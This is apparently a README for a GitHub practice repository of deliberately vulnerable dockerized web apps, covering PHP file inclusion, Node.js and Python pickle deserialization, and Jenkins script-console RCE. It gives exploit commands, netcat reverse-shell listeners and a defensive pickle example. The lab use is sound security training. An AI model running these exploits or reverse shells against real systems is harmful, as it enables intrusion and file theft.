Dockerized web applications that have known vulnerabilities, with examples of how to exploit them.

mikaelkall/vulnhub

vulnhub

Description

This project is a set of dockerized web applications that have known vulnerabilities, each with an example of how to exploit it.

Usage

Start all vulnerable Docker containers:

   docker-compose up -d

lfi-php5

Example of how to exploit this container.
This command shows how to use an LFI (local file inclusion) to loot server-side files that normally cannot be browsed or downloaded.

lfi-loot.py -f index.php -g file -u http://localhost:8080

nodejs-deserialization

Example of how to exploit this container.

nc -nlvp 1337
./nodejs_deser_rce_nc.py http://localhost:3000 127.0.0.1 1337

The same exploit with a built-in listener, so no netcat listener is needed.

./nodejs_deser_rce.py http://localhost:3000 127.0.0.1 1337

pypickle-deserialization

Example of how to exploit this container.

nc -nlvp 1337
./pycpickle_deser_rce_nc.py http://localhost:5000 127.0.0.1 1337

The same exploit with a built-in listener, so no netcat listener is needed.

./pypicke_deser_rce.py http://localhost:5000 127.0.0.1 1337
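
The defect class behind the pypickle-deserialization container is unpickling bytes the client controls. The sketch below is an added example, not code from this repository: it shows why the stock loader is unsafe and how a data-only unpickler rejects the same input. All names (`Probe`, `DataOnlyUnpickler`, `safe_loads`, `demo`) are hypothetical and the sample inputs are constructed.

```python
import io
import pickle

# Hypothetical names throughout; this is not the container's code.


class Probe:
    """Constructed, harmless stand-in for an untrusted pickle: on load it
    makes the unpickler call len("abc") instead of rebuilding a Probe."""

    def __reduce__(self):
        return (len, ("abc",))


class DataOnlyUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup, so a stream can only
    produce built-in containers and scalars (dict, list, str, int, ...)."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data: bytes):
    """Deserialize data-only pickles; raise UnpicklingError on anything else."""
    return DataOnlyUnpickler(io.BytesIO(data)).load()


def demo():
    untrusted = pickle.dumps(Probe())  # constructed sample input
    plain = pickle.dumps({"user": "alice", "roles": ["viewer"]})

    # Stock loader: the byte stream, not the application, picks the callable.
    stock_result = pickle.loads(untrusted)  # 3, not a Probe instance

    try:
        safe_loads(untrusted)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True

    return stock_result, blocked, safe_loads(plain)


if __name__ == "__main__":
    print(demo())
```

Where the payload is only dicts, lists and scalars, switching the wire format to JSON removes the unpickler from the request path entirely.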

jenkins-docker

Example of how to exploit this container.

./jenkins_sconsole_rce.py 'http://localhost:8080' 10.10.14.24 1337 admin admin

get-php

Example of how to exploit this container.

shellupgrader.py http://localhost/index.php 127.0.0.1 1337
